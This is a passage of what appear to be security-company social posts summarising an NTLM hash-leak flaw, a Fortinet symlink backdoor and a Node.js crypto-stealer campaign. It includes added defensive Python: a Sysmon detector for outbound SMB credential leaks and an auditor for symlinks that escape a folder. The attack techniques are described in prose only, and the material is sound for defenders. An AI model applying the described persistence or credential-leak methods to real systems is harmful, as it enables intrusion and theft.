- These hashes can then be used for pass-the-hash or lateral movement attacks inside the network

Check Point reports that the vulnerability has been exploited in at least 10 campaigns so far, targeting government and private organizations in Poland, Romania, Ukraine, and Colombia.

What makes this threat more dangerous:
- NTLM is deprecated but still present in many environments
- Minimal user interaction is required — just download and extract
- It bypasses common detection tools by triggering quietly in Windows Explorer
- It's a variant of a previously exploited flaw (CVE-2024-43451)

Microsoft patched the flaw in March, but exploitation began almost immediately. Agencies under the FCEB have until May 8 to patch — but every organization should act sooner.

At @Efani we view this as another reminder that legacy protocols like NTLM are low-hanging fruit for attackers. Even medium-severity flaws can become major risks when they require near-zero user interaction.

Patch. Audit. Replace legacy auth where possible.

#CyberSecurity #NTLM #WindowsVulnerability #CVE202524054 #CredentialSecurity #EfaniSecure
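Because the leak described above works by making Windows Explorer open an SMB connection to an attacker-controlled host, an outbound SMB connection from a workstation to a non-internal address is the observable that defenders can alert on (and block at the perimeter) regardless of patch status. The following is an added example, not from Check Point, CISA or Microsoft: it scans Sysmon Event ID 3 (network connection) records, whose field names (`Image`, `Initiated`, `DestinationIp`, `DestinationPort`) are Sysmon's, and raises severity when the originating process is a file-preview process. The event records, hostnames and destination addresses are constructed.

```python
"""Flag outbound SMB to non-internal addresses in Sysmon Event ID 3 records (added example)."""
import ipaddress
import json

SMB_PORTS = {445, 139}
# Explicit internal ranges (RFC 1918, loopback, link-local) rather than ip.is_global, so that
# the documentation-range addresses used in the constructed sample count as "external".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
# Processes that render folder listings or file previews; SMB from these to the internet is
# the signature of the click-free leak described above, so it gets the higher severity.
PREVIEW_PROCESSES = {"explorer.exe", "searchprotocolhost.exe", "searchindexer.exe"}

def is_internal(ip_text):
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in INTERNAL_NETS)

def outbound_smb_alerts(records):
    """Return one alert dict per outbound SMB connection to a non-internal destination."""
    alerts = []
    for rec in records:
        # Only connections this host initiated (Initiated="true") on an SMB port matter here
        if str(rec.get("EventID")) != "3" or str(rec.get("Initiated")).lower() != "true":
            continue
        if int(rec.get("DestinationPort", 0)) not in SMB_PORTS:
            continue
        if is_internal(rec["DestinationIp"]):
            continue
        image = str(rec.get("Image", "")).rsplit("\\", 1)[-1].lower()
        alerts.append({
            "host": rec.get("Computer"),
            "user": rec.get("User"),
            "process": image,
            "destination": f'{rec["DestinationIp"]}:{rec["DestinationPort"]}',
            "severity": "high" if image in PREVIEW_PROCESSES else "medium",
        })
    return alerts

def parse_json_lines(text):
    """Parse newline-delimited JSON as exported by most SIEM/agent pipelines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

# Constructed Sysmon-style events: one Explorer preview leaking to the internet, one legitimate
# internal file-share access, one HTTPS connection, one scripted SMB probe, one inbound connection.
CONSTRUCTED_EVENTS = "\n".join([
    r'{"EventID": 3, "Computer": "WS01", "User": "CORP\\alice", "Image": "C:\\Windows\\explorer.exe", "Initiated": "true", "DestinationIp": "203.0.113.5", "DestinationPort": 445}',
    r'{"EventID": 3, "Computer": "WS01", "User": "CORP\\alice", "Image": "C:\\Windows\\explorer.exe", "Initiated": "true", "DestinationIp": "10.0.0.7", "DestinationPort": 445}',
    r'{"EventID": 3, "Computer": "WS01", "User": "CORP\\alice", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "Initiated": "true", "DestinationIp": "203.0.113.9", "DestinationPort": 443}',
    r'{"EventID": 3, "Computer": "WS02", "User": "CORP\\bob", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "Initiated": "true", "DestinationIp": "198.51.100.20", "DestinationPort": 445}',
    r'{"EventID": 3, "Computer": "FS01", "User": "NT AUTHORITY\\SYSTEM", "Image": "System", "Initiated": "false", "DestinationIp": "10.0.0.44", "DestinationPort": 445}',
])

if __name__ == "__main__":
    for alert in outbound_smb_alerts(parse_json_lines(CONSTRUCTED_EVENTS)):
        print(alert)
```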

2025-04-17

⚠️ Over 16,000 Fortinet devices have been compromised with a stealthy symlink backdoor — even after being patched.

A report from The Shadowserver Foundation reveals that attackers left behind a persistent backdoor on FortiGate devices by abusing symbolic links. These links provide read-only access to sensitive configuration files, even after vulnerabilities were patched.

Here’s what happened:
- Threat actors exploited FortiOS zero-days throughout 2023 and 2024
- They planted symbolic links in language file folders on SSL-VPN enabled devices
- These links connected public folders to the root filesystem
- Even after patching, the symlinks gave attackers continued visibility into sensitive files

Fortinet says this isn’t due to a new vulnerability — it’s a "persistence mechanism" that evaded detection by living in user-accessible directories.

The impact:
- Over 16,000 devices globally are affected
- Attackers may have had access to configuration files, including credentials
- Fortinet is notifying affected customers and has released updated AV/IPS signatures to detect and remove the malicious symlinks

🔐 If you're using FortiGate:
- Check for recent alerts from Fortinet
- Update to the latest firmware
- Reset all credentials
- Audit logs for suspicious access behavior

At Efani, we view this as a critical reminder: patching isn’t the end of an incident — it’s the start of validation. Persistence mechanisms like this one don’t need new vulnerabilities to survive.

#CyberSecurity #Fortinet #Persistence #ZeroDay #EfaniSecure #NetworkSecurity
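The persistence mechanism described above is a symbolic link placed in a user-accessible folder that resolves into the root filesystem, which patching does not remove. The following is an added example, not Fortinet's signature or tooling: a generic audit that walks a folder tree (for instance a mounted or exported filesystem image) and reports every symlink whose resolved target lies outside the tree, so that links such as a language folder pointing at `/` stand out. The demo tree, its folder names and the link targets are constructed and say nothing about FortiOS's real layout.

```python
"""Find symlinks under a served folder that resolve outside it (added example, constructed demo)."""
import os
import tempfile
from pathlib import Path

def find_escaping_symlinks(root):
    """Return (relative link path, raw target, resolved target) for every symlink escaping root."""
    root = Path(root).resolve()
    findings = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        # os.walk lists symlinked directories in dirnames but, with followlinks=False,
        # never descends into them, so a link to "/" cannot drag the whole disk into the scan.
        for name in dirnames + filenames:
            link = Path(dirpath) / name
            if not link.is_symlink():
                continue
            target = os.readlink(link)
            resolved = Path(target) if os.path.isabs(target) else link.parent / target
            resolved = resolved.resolve()  # non-strict: broken links still resolve to a path
            if resolved != root and root not in resolved.parents:
                findings.append((str(link.relative_to(root)), target, str(resolved)))
    return findings

def build_demo_tree():
    """Constructed layout: a language folder with one legitimate and two escaping symlinks."""
    base = Path(tempfile.mkdtemp(prefix="symlink-audit-"))
    lang = base / "lang"
    (lang / "en").mkdir(parents=True)
    (lang / "en" / "strings.txt").write_text("hello\n")
    os.symlink("en", lang / "default")        # legitimate: stays inside the served tree
    os.symlink("/", lang / "fr")              # escaping: exposes the root filesystem
    os.symlink("../../etc", lang / "de")      # escaping via relative traversal
    return lang

if __name__ == "__main__":
    for rel, target, resolved in find_escaping_symlinks(build_demo_tree()):
        print(f"{rel} -> {target} (resolves to {resolved})")
```

Run it against the served web root of an appliance image rather than the live device, and treat any hit as evidence of prior compromise that calls for the credential reset and log audit listed above, not just link removal.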

2025-04-17

⚠️ A new Node.js malware campaign is targeting crypto users with fake Binance and TradingView installers — using clever tricks to bypass detection and steal sensitive data.

Microsoft has detailed an active malvertising campaign exploiting Node.js and PowerShell to deliver info-stealing malware disguised as legitimate trading apps. First detected in late 2024, the campaign is aimed at crypto users and leverages fake installer sites that mimic well-known brands like Binance and TradingView.

Here’s how it works:
- Users download a rogue installer bundled with a malicious DLL (CustomActions.dll)
- The DLL collects system data, sets up persistence, and uses msedge_proxy.exe to load the real Binance website, masking the attack
- PowerShell commands then exclude the malware from Defender scans, fetch additional scripts, and send stolen data via HTTPS
- The attack culminates in deploying Node.js binaries and JavaScript code to perform deeper data exfiltration

In some cases, attackers use inline JavaScript execution and disguise traffic as Cloudflare activity to avoid detection. They also modify registry keys for persistence.

⚠️ The attack highlights:
- Node.js is trusted and cross-platform — making it a perfect vehicle for abuse
- Cloudflare-like traffic and system masquerading make this hard to detect
- The campaign uses ClickFix, malvertising, and phishing tactics — all increasingly common in targeted attacks

🎯 At @Efani, we warn against assuming any installer, script, or utility is safe just because it looks familiar.
With modern threat actors blending real and fake environments seamlessly, vigilance, endpoint monitoring, and script-level threat detection are essential.

If you're in crypto, finance, or handle sensitive data: assume you're a target.

#CyberSecurity #Malware #Nodejs #EfaniSecure #CryptoSecurity

Client Info

Server: https://mastodon.social